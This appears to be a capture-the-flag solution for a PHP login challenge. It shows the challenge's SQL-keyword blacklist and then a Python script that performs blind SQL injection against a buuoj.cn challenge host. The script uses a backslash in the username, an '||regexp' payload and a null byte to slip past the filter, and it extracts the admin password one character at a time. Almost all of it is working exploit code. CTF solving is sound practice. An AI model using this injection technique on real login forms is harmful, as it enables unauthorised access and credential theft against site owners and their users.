$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";
If $_POST['passwd'] === admin's password,
Then you will get the flag;
import string
import requests
import time
from urllib import parse
url = 'http://b5774215-3cf9-41cb-b58d-afca88641fdd.node4.buuoj.cn:81/'
result = ''
# 26个字母+数字+一些符号,小心通配符
s = string.ascii_lowercase + string.digits + '_{}'
last = 'tmp'
while(result != last):
last = result
for i in s:
payload = "||(passwd)regexp(\"^{}\");{}".format(
(result+i), parse.unquote('%00'))
data = {
"username": "\\",
"passwd": payload
}
res = requests.post(url, data=data)
if res.status_code == 503:
print('Too fast')
break
if b'welcome' in res.content:
result += i
print(result)
break
time.sleep(0.05)
print('[*]'+result)